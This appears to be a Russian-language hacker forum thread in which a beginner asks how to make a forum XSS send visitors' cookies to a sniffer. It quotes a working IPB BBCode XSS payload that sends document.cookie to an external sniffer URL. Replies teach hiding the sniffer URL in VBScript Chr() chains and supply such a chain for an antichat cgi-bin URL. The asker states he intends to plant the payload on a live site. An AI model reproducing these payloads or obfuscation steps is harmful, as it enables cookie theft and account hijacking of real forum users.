Помогите перваку, как в такой XSS a указать путь к античатовскому снифферу. Вопрос лажовый, думаю вам ответить на него пару пустяков...

Помогите перваку, как в такой XSS a [/HTML] указать путь к античатовскому снифферу. Вопрос лажовый, думаю вам ответить на него пару пустяков...

И как ты предстовляеш себе реализаию XSS с элементами C++ если я не ошибаюсь ???

Я ничё не понял

там vbscript, а Chr( ) это встроенная функция, возвращающая символ, имеющий заданный код ASCII

коды ASCII - http://electronics.sortos.ru/docs/ascii_table.html

составляешь цепочку из Chr() где и будет твой код сниффера и не забудь пробел убрать ("repl ace" -> "replace")

;)

незабудь про ±

все ответили так же как и я только у меня у одного пост удалили почему-то.

VectorG я то тебе + могу поставить, мне ни жалко...Только я ничерта не понял, как должна быть выгледеть это цепочка, чтоб в ней был код сниффера...
Попробую спросить вас по другому, что мне надо добавить в этот XSS, чтоб после его, размешенния куки пользователей приходили на сниффер.
Вот например после размешенния вот такой XSS [em*ail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://site/snif.jpg?"+document.cookie);` на IPB мне сливаються куки. Вот как в той XSS реализовать это, если это вообще возможно?

VectorG я понял так твой пост...
Если URL к снифферу будет выглядить например вот так "http://site/snif.php" то мне надо в скобки Chr вставлять каждый символ URL'а , тоесть например http должно выглядить так, к примеру по коду Decimal из таблицы ASCII

Chr(104)+Chr(116)+Chr(116)+Chr(112)

Я правильно понял? Если нет, то ни мог бы ты поконкретний объяснить?

To Vovec: ты прально понял...

Vovec, а в чем вопрос? тебе дали таблицу аски. Ты хочешь, чтобы тебе перевели http://site/snif.php к виду chr()? Ну тогда предоставь полный адрес снифера. И то не знаю есть ли здесь альтруисты... ;)

podkashey да не, я всё что к чему уже понял, сначало просто не догнал.Только есть ещё вапросы, на которые я надеюсь вы дадите ответы. Если я укажу URL каторый я указал ниже, в кодах ACSII к примеру,то он будет работать или я его не правильно сформировал? И ещё вопрос, в коды ACSII надо загонять только URL, или также всё что идёт после s.jpg http://antichat.ru/cgi-bin/s.jpg?+document.cookie Больше негде спросить, кроме как у вас...

http://antichat.ru/cgi-bin/s.jpg?+document.cookie


Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47 )+Chr(47)+Chr(97)+Chr(110)+Chr(97)+Chr(116)+Chr(10 5)+Chr(99)+Chr(104)+Chr(97)+Chr(116)+Chr(46)+Chr(1 14)+Chr(117)+Chr(47)+Chr(99)+Chr(103)+Chr(105)+Chr (45)+Chr(98)+Chr(105)+Chr(110)+Chr(47)+Chr(115)+Ch r(46)+Chr(106)+Chr(112)+Chr(103)+Chr(63)+Chr(43)+C hr(100)+Chr(111)+Chr(99)+Chr(100)+Chr(117)+Chr(100 )+Chr(109)+Chr(101)+Chr(110)+Chr(116)+Chr(46)+Chr( 99)+Chr(111)+Chr(111)+Chr(107)+Chr(115)+Chr(101)

Вот проверь

Конеш спасибо что не поленилься мне Url перевести в Ascii код, держи за это + , но проверить мне негде, на том сайте на катором я хотел это разместить это палевно(нельзя потом удалить), а на лакалхосте немогу так как не могу найти Xoops этой версии, больная старая она наверно=) Да и вообще я сомневаюсь что на том сайте где я хотел разместить этот Xss та версия. Лучше подскажите мне прогу которой лучше всего определять версию движков?